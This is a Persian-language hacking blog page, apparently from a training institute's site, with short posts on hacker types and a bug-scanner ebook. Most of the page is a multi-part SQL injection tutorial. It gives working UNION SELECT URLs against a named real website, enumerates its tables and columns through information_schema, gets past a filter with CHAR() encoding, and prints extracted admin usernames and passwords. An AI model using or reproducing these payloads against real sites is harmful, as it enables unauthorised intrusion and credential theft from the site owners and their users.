loading...
مجتمع دیباگران حر
منوی اصلی سایت

 

 

مقالات

موبایل

هکینگ

در حال احداث

 
 

در حال احداث

در حال احداث

در حال احداث

در حال احداث

 
 

در حال احداث

در حال احداث

در حال احداث

در حال احداث
آخرین ارسال های انجمن
hacker بازدید : 101 جمعه 1392/05/04 نظرات (0)

دانلود کتاب PDF باگ اسکنر ها

bug scanner

 

نام کتاب :  باگ اسکنر ها

نویسنده : حامد باقری

ناشر :  پارس بوک

زبان کتاب :  فارسی

تعداد صفحه :  ۱۸

قالب کتاب : PDF

حجم فایل : ۴۷۸  Kb

توضیحات :  امروزه هکر ها به جای صرف ساعتها وقت برای پیدا کردن حفره های امنیتی و ضعفهای برنامه نویسی صفحات وب از نرم افزارهای باگ اسکنر استفاده میکنند. این نرم افزارها پس از گرفتن آدرس سایت و تحلیل آن، ضعف های موجود را برای هکر لیست میکنند. در این کتاب با این نرم افزارها بیشتر آشنا میشوید.

 

دانلود در ادامه مطلب

.

.

.


 

hacker بازدید : 160 جمعه 1392/05/04 نظرات (0)

برای اینکه انواع تخصص هکر ها را متوجه شوید ما چارت یک تیم هکری کامل را در اینجا می آوریم.

 

البته این چارت میتواند بنا به نیاز هر تیم کامل تر و یا کاملا متفاوت باشد.

ما تخصص های امنیت و هکینگ رو به چند دسته تقسیم کردیم و برای هر یک چند نفر را در نظر گرفتیم .

 

در ادامه این پست معرفی میکنم باتشکر216

 

 

 

 

 


hacker بازدید : 132 جمعه 1392/05/04 نظرات (0)

برای اینکه انواع تخصص هکر ها را متوجه شوید ما چارت یک تیم هکری کامل را در اینجا می آوریم.

 

البته این چارت میتواند بنا به نیاز هر تیم کامل تر و یا کاملا متفاوت باشد.

ما تخصص های امنیت و هکینگ رو به چند دسته تقسیم کردیم و برای هر یک چند نفر را در نظر گرفتیم .

 

در ادامه این پست معرفی میکنم باتشکر216

 

 

 

 

 


hacker بازدید : 131 جمعه 1392/05/04 نظرات (0)

با توجه به توضیحاتی که داده شد هکر شدن به معنی متخصص شدن در تمام امور مرتبط به رایانه در حدی که بتوان به هر نوع سیستمی نفوذ کرد تقریبا غیر ممکن است پس بهتر است بدانید دقیقا میخواهید چه کاره شوید
اما یک کلیات یکسان در تمامی تخصص ها وجود دارد که باید به حد کافی آنها را بدانید من در اینجا ابتدا کلیات یکسان را می نویسم و سپس تک تک تخصص های جامع را برسی میکنم.

به صورت کلی هر کسی به شاخه های امنیت و ضد امنیت اطلاعات علاقه مند است بهتر است با موارد زیر آشنایی داشته باشد

1- سیستم عامل های مختلف : فهم عمیق ویندوز و لینوکس ضروری هستند ولی بهتر است با دیگر سیستم عامل ها مانند MAC , BSD , و ... (حتی سیستم عامل های موبایل مانند Android , IOS) آشنا باشید , سیستم عامل های ویندوز XP و ویندوز 7 و توضیع لینوکس Backtrack برای شما بسیار مفید و کاربردی خواهند بود.

2- شبکه : مهم نیست میخواهید در چه زمینه ای فعالیت کنید اما بدانید که برای هر گونه فعالیت که قرار است نفوذی در آن انجام شود معمولا یک ارتباط وجود دارد و این ارتباط شبکه ای است Network+ برای شروع کافی است.

3- برنامه نویسی : فهم و درک برنامه نویسی برای هر فردی که میخواهد در این راستا کار کند ضروری است مهم نیست با چه زبانی برنامه نویسی میکنید اما باید یک زبان برنامه نویسی را بدانید پایتون یک گزینه ی فوق العاده است.

.

.

این مطلب ادامه دارد .... 21624

درباره هک ,
hacker بازدید : 98 جمعه 1392/05/04 نظرات (0)

 

 

به هرگونه نفوذی به هر سخت افزار و نرم افزار که باعث ایجاد اختلال سرقت اطلاعات , تغییر عملکرد و ...انجام شود هک گفته میشود و هگینگ به هیچ وجه تنها مختص به رایانه نمیشود !
هکر شدن در دنیای امروز کاملا معنی متفاوتی دارد و اسامی آبرومندانه تری مانند Ethical Hacker , Penetration Tester , Security Researcher , Computer Security Specialist و ... را به خود گرفته است که کمی محترمانه تر باشد
اما در انواع و اقسام اسامی مختلفی که برای هکرها استفاده شود, این اسامی تنها در چهارچوب و قالب جدیدتری به هکینگ میدهند.

درست است که تنها 11 سال از مقاله ای که اریک نوشته است میگذرد اما دنیای حال حاضر هکینگ دنیایی کاملا متفاوت است در تاریخی که ما در آن قرار داریم علوم امنیت و ضد امنیت اطلاعات
بسیار پیشرفته کرده اند و دارای انواع و اقسام زیر شاخه ها هستند به نحوی که دیگر یک فرد نمیتواند مانند گذشته یک متخصص تمام عیار در تمام شاخه های این موضوع باشد. بنابراین از همین ابتدای کار بدانید که
اگر متخصص یک یا در نهایت چند موضوع باشید بهتر از این است که از هر شاخه ای فقط کمی بدانید در این علوم یک دریاچه ی عمیق بودن خیلی بهتر از یک اوقیانوس با عمق 3 سانت است !


در دنیایی هکر ها به انواع هکر انواع رنگ کلاه را ارتباط میدهد .
هکر کلاه سیاه (blackhat) : این نوع هکر تنها به فکر نفوذ است و زیاد به قانون اهمیت نمیدهد و معمولا مهارت بالایی دارد.
هکر کلاه سفید (whitehat) : هکری که از دانش خود برای امن سازی سیستم ها و تشخیص نفوذ استفاده میکند
هکر کلاه خاکستری (grayhat) : هکری که بهتر است بگوییم هر جا پول باشد همانجا است ! گاهی با امن سازی و گاهی با نفوذ
هکر کلاه صورتی (pink) : هکر کلمه ی مناسبی برای این گروه نیست افرادی که با استفاده از انواع ابزار و آسیب پذیری عمومی با تخریب نرم افزار ها و سایت ها خود را هکر جلوه میدهند و سعی بر کسب شهرت دارند.

ka30r بازدید : 105 پنجشنبه 1392/05/03 نظرات (0)

مروز یه آموزش خیلی راحت براتون دارم....


اگه یادتون بیاد تا اونجا پیشرفتیم که تونستیم لیست column های موجود در table آدمین رو کش بریم

که اینا بودن "id,loginname,namelc,email,created,modified,modifi edby,password,passwordchanged,superuser,disabled"

خوب کار ما از این راحت تر نمیشد!!!

الان تنها کاری که لازمه انجام بدیم اینه که اطلاعاتی که از توی این لیست ها لازم داریم رو درخواست کنیم

برای این کار از دستوری به شکل زیر استفاده میکنیم.

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(loginname,char(58),password),3,4,5,6,7,8,9,10,11,12,13 from phplist_admin--


اگر دقیق به این دستور نگاه کنید میبینید که تفاوت چندانی با دستورات قبلی ما نداره و تنها کاری که من انجام دادم این بود که به دیتابیس سایت گفتم اطلاعات موجود در Loginname و password رو که توی تیبل phplist_admin هستش به من نشون بده. با دستور group_concat هم که آشنا هستید.....
تنها نکته ای که میشه اینجا اشاره کرد (char (58 هستش که دلم میخواد خودتون برین بفهمید چیه .

هرکی نفهمید پ.خ کنه تا کامل براش توضیح بدم.


دوستان ما با استفاده از باگ sql تونستیم به دیتابیس سایت نفوذ کنیم و یوزر و پسورد رو بکشیم بیرون :
"admin:coshuk,listadminassword,listadmin2assword,listadmin3assword"

ka30r بازدید : 149 پنجشنبه 1392/05/03 نظرات (0)

خوب بریم به ادامه ی آموزش هامون برسیم تا اونجا پیش رفتیم که با دستور table_name اسم تمام table ها رو کشیدیم بیرون به این صورت :


کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables--


حالا باید table مورد نظرمون رو انتخاب کنید.

من لیست table های تارگتمون رو کپی میکنم اینجا تا روش بحث کنیم.
[CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,category,country_master,eventlog,insurance_setup, link_master,phplist_admin,phplist_admin_attribute, phpli

خوب حالا ما از کجا بدونیم اطلاعاتی که ما میخوایم تو کدوم table موجوده؟؟


ما دنبال user و pass میگردیم پس به احتمال زیاد این اطلاعات تو یه table مربوط به ادمین وجود داره ....

اون table هایی که رنگشون رو بنفش کردم table های مربوط به information_schema هستش و در تمام ورژن های بالا ی 5 وجود داره و معمولا توی این table ها چیزه به درد بخوری برای ما وجود نداره 
بقیه ی table ها رو ما به ترتیب اولویت ( که از رو اسم و تجربه ی هکر بدست مییاد ) باید بگردیم...

اولین table ای که من نگاه میکنم و به احتمال زیاد اطلاعاتی که میخوام اونجاست phplist_admin تیبل هستش اگه اینجا نباشه میرم دنبال بقیه ی تیبل ها

بریم ببینیم چطوری و با چه دستوری باید اطلاعات تیبل phplist_admin رو بیرون بکشیم!!!

برای اینکه من اطلاعات رو از table مورد نظر خودم بکشم بیرون اولین کاری که انجام میدم اینه که column های موجود در تیبل مورد نظرم رو از information_schema درخواست میکنم 

به این صورت :

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=phplist_admin--


تو دستور بالا من با دستور column_name از پایگاه information_schema در قسمت columns خواستیم که تمام اطلاعات مربوط به تیبل phplist_admin رو به ما بده 

ولی این دستور کار نکرد !!!!! 

چرا کار نکرد ؟؟؟؟؟؟؟

خوب دلیلش اینه که بعضی وقت ها برای اینکه هکر ها کارشون سخت تر شه روی اطلاعات مهم یه سری کار های امنیتی انجام میدن 
مثلا تو این مورد اطلاعات اسم column های موجود رو ما باید به صورت چار (CHAR) درخواست کنیم 
char کلمات رو به کارکتر های موجود روی کیبورد تبدیل میکنه در اصل char همون مخفف charecter هستش......
برای اینکه بتونید از char راحت تر استفاده کنید پیشنهاد میکنم از افزونه ی HACKER BAR موجود در fire fox استفاده کنید این افزونه به شما کمک می کنه به راحتی هر کلمه ای رو به چار تبدیل کنید 

خوب حالا من میام phplist_admin رو به چار تبدیل میکنم که میشه :

CHAR(112, 104, 112, 108, 105, 115, 116, 95, 97, 100, 109, 105, 110)


حالا اینو به جای اسم table خودم میزارم و دوباره دستور رو اجرا میکنم.....


کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(112, 104, 112, 108, 105, 115, 116, 95, 97, 100, 109, 105, 110)--


خوب همونطور که میبینید ما تونستیم column های موجود در table ادمین رو ببینیم و همونطور که میبینید اطلاعات مورد نیاز ما هم همینجاست!!!!!!!!!!!!!!!!


توی آموزش بعدی نحوه ی بدست آوردن این اطلاعات رو بهتون نشون میدم 

با استقبالتون خستگی کار یادم میره !!!!

امیدوارم مفید واقع شه

ka30r بازدید : 90 پنجشنبه 1392/05/03 نظرات (0)

خوب دوستان عزیز 

در ادامه ی این آموزش ها میرسیم به دستور table_name که به ما لیست table های موجود در دیتابیس رو می ده 
خوب برای این کار ما میتونیم این دستور رو به صورت (group_concat(table_name استفاده کنیم
همونطور که قبلا هم توضیح دادم دستور group_concat اطلاعات درخواستی ما رو از تمام database ها میده پس ما در این دستور تمام تیبل ها رو از تمام دیتابیس های موجود در سایت درخواست کردیم.
خوب دوستان اگه یادتون باشه تارگتی که ما انتخاب کردیم دارای دیتابیس ورژن بالای 5 بود که این خبر خوبی برای ما بود 
به این دلیل که تمام اطلاعات مورد نیاز ما در یک database جدا به نام information_schema ذخیره شده 
پس تنها کاری که نیازه ما انجام بدیم اینه که با نوشتن یک دستور بر روی table آسیب پذیر این اطلاعات رو از information_schema بخوایم


خوب بریم ببینیم روی تارگتمون میتونیم پیاده کنیم یا نه!!!!


کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables--


خوب تو دستور بالا من اول مثل تمامی مثال های قبل یه منفی پشت عدد ID گذاشتم تا تعداد table های ما از تعداد id ما کمتر نشه (یا از بازه خارج شه )
بعد اومدم تو table آسیب پذیر از دستور group_concat استفاده کردم که اطلاعات مورد نیازم رو از تمامی دیتابیس های موجود در سایت به طور کامل بهم بده
بعد توی group_concat گفتم که من نام تمامی تیبل هارو میخوام که اونم با دستور table_name درخواست میشه ....
و در آخر هم نشانی یا همون آدرس جایی رو که این اطلاعات ذحیره شده رو دادم به این صورت:
همون طور که حتم دارم همتون میدونید from یعنی از !!!!
information_schema هم که همون پایگاه موجود در دیتابیس هایی با ورژن بالای 5 است که کار مارو خیلی راحت کرده بود !!!!!!!!!!
table . هم که یه دایرکتوری تو information_schema هستش که اطلاعات تیبل ها اونجا میره و .....

پس ما اومدیم گفتیم اسم تیبل ها رو از تمامی دیتابیس های سایت که توی information_schema در قسمت table موجود هست به ما بده به همین راحتی 

اینم از table ها برین تمرین کنید 
آموزش های بعدی رو هم سعی میکنم هر چه زودتر براتون بنویسم 

 

ka30r بازدید : 120 پنجشنبه 1392/05/03 نظرات (0)

قبل از ادامه ی درس ها تصمیم گرفتم چند تا از دستورات مهم رو براتون تک تک با کارش توضیح بدم که درک بهتری از sql داشته باشید



خوب ما تا اونجا پیش رفتیم که تعداد table ها رو پیدا کردیم و table نفوذ پزیر رو مشخص کردیم

حالا یک سری دستور بهتون یاد میدم که برای جمع آوری اطلاعات به کار میره :

اولین دستور که استفادده میکنیم دستور () version هستش که همونطور که از اسمش مشخصه به ما ورژن دیتابیس رو مشخص می کنه

دونستن ورژن دیتابیس به ما تو بعضی از ریزه کاری های نفوذ کمک میکنه
برای مثال ورژن هایی با دیتابیس بالا ی 5 دارای یک دیتابیس جداگانه به نام informatin_schema هستند که اطلاعات مربوط به پیکر بندی سایت در آن قرار میگیرد و ما میتوانیم اسامی table ها رو با دستور مناسب از information_schemaدرخواست نماییم

ولی اگر ورژن دیتابیس از 5 پایین تر باشد پایگاه informatin_schema وجود نخواهد داشت و ما باید table ها رو حدس بزنیم که کار سختی برای یک هکر تازه کار است...


دستور بعدی دستور user () هستش که به ما اطلاعاتی از user ها ی اصلی سایت رو مشخص میکنه و زمانی به درد ما میخوره که ما نمیتونیم به سایت نفوذ کنیم ولی میتونیم این دستورات رو اجرا کنیم و با این کار ما اطلاعات جمع آوری میکنیم !!!


دستور سوم دستور () group_concat هستش که به ما تمامی اطلاعات فراخوانی شده رو از تمامی دیتابیس های سایت میده
مثلا اگر ما دستور user() رو اجرا کنیم و فقط یک یوزر به ما بده ما میتوانیم با دستور (()Group_concat(user تمامی یوزر های سایت رو در صورت وجود فراخوانی کنیم ....


تا همینجا اکتفا میکنم به این دستور ها ولی بهتون میگم که دستورات کاربردی بهتری وجود داره که من دیگه اینجا توضیح نمیدم تا مقداری از کار به عهده ی خود شما باشه ......

خوب دوستان

مثال اول برای دستور ()version هستش :

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--


خوب همونطور که مشاهده میکنید تارگت ما دارای ورژن دیتابیس 5 به بالا هستش که کار ما رو خیلی راحت تر میکنه

دستور دوم

دستور () user هستش که یوزر ها رو برامون لیست میکنه 

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,user(),3,4,5,6,7,8,9,10,11,12,13


برای دستور سوم هم در جلسه ی چهارم آموزش sql مثال میزنم چون توضیحاتش مفصل تره

موفق و پیروز باشید

ka30r بازدید : 117 پنجشنبه 1392/05/03 نظرات (0)

آموزش سوم در رابطه با پیدا کردن table های آسیب پذیر با دستور union select هستش

برای این کار پس از پیدا کردن تعداد table ها به صورت زیر عمل میکنیم :

کد:
www.site.com/html/images.php?id=-27 union select [ table ha be tartib ]



دقت کنید که قبل از شماره ی ایدی از یک منفی استفاده میشه

پس شما اگر فرض کنید که ما 10 table داشته باشیم دستور ما به این صورت خواهد بود :


کد:
www.site.com/html/images.php?id=-27 union select 1,2,3,4,5,6,7,8,9,10--




با این دستور اعدادی بر روی صفحه نمایان میشوند که همان شماره ی table ها ی اسیب پذیر هستن

تو پست بعدی یک مثال از این درس براتون میزارم تا کامل متوجه بشید

خوب دوستان ما تو مثال دوم با دستور order by تعداد table ها رو پیدا کردیم که 13 تا بود

حالا می خواهیم ببینیم کدوم یک از این 13 تا table آسیب پذیر هستش

برای این کار من با همون target قبلیمون پیش میرم و به صورت زیر دستور خودم رو وارد می کنم :

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--



حالا اگه دقت کنید عدد 2 رو روی صفحه میبینید که شماره ی table آسیب پذیر ما هست و ما با استفاده از این table کد های خودمون رو اینجکت میکنیم


هیشه پیروز باشید

تعداد صفحات : 9

درباره ما
این سایت جهت برقراری ارتباط با کارآموزان دانشگاه دیباگران حر طراحی شده و کارآموز می تواند تمامی مطالب گفته شده در کلاس را در این سایت بیابد . در ضمن تمامی مشخصات دانش آموز در همین سایت آپلود شده و در دسترس تمامی کارآموزان عزیز قرار می گیرد. با تشکر ka30r
اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    آمار سایت
  • کل مطالب : 85
  • کل نظرات : 0
  • افراد آنلاین : 1
  • تعداد اعضا : 46
  • آی پی امروز : 7
  • آی پی دیروز : 6
  • بازدید امروز : 31
  • باردید دیروز : 8
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 89
  • بازدید ماه : 318
  • بازدید سال : 2,607
  • بازدید کلی : 40,073
  • دانلود نرم افزار کاربردی
    لیست دانلود نرم افزار  "رایگان "
    دانلود IDM 
    آپدیت شده در 4 مرداد
    دانلود ویندوز 8 و 7 و XP 
    آپدیت شده در 8 مرداد
    محصولات Adobe 
    آپدیت شده در 2 تیر
    محصولات Autodesk 
    آپدیت شده در 21 تیر
    دانلود مرورگر موزیلا 
    آپدیت شده در 4 تیر
    مرورگر اينترنت اكسپلورر 
    آپدیت شده در 3 مرداد
    دانلود Google Chrome 
    آپدیت شده در 8 مرداد
    مرورگر Opera 
    آپدیت شده در 26 تیر
    دانلود یاهو مسنجر 
    آپدیت شده در 11 خرداد 91
    دانلود Winrar 
    آپدیت شده در 25 خرداد 91
    دانلود Winamp 
    آپدیت شده در 2 مرداد
    پلیرهای محبوب 
    آپدیت شده در 4 تیر
    محصولات Nero 
    آپدیت شده در 6 خرداد
    محصولات ESET 
    آپدیت شده در 14 اردیبهشت
    محصولات Kaspersky 
    آپدیت شده در 8 مرداد
    محصولات مکافی 
    آپدیت شده در 3 بهمن
    محصولات نورتون 
    آپدیت شده در 28 خرداد
    محصولات Avira 
    آپدیت شده در 1 مرداد
    محصولات Avast 
    آپدیت شده در 19 اردیبهشت
    محصولات BitDefender 
    آپدیت شده در 18 خرداد
    محصولات AVG 
    آپدیت شده در 8 مرداد
    Foxit Reader مشاهده PDF 
    آپدیت شده در 7 مرداد
    محصولات Xilisoft 
    آپدیت شده در 18 تیر
    محصولات Magix 
    آپدیت شده در 6 مرداد
    محصولات Wondershare 
    آپدیت شده در 29 اردیبهشت
    محصولات Ashampoo 
    آپدیت شده در 4 مرداد
    TuneUp Utilities 
    آپدیت شده در 19 بهمن
    محصولات AVS 
    آپدیت شده در 20 تیر
    محصولات CyberLink 
    آپدیت شده در 22 تیر
    Firewall App Blocker 
    آپدیت شده در 2 مرداد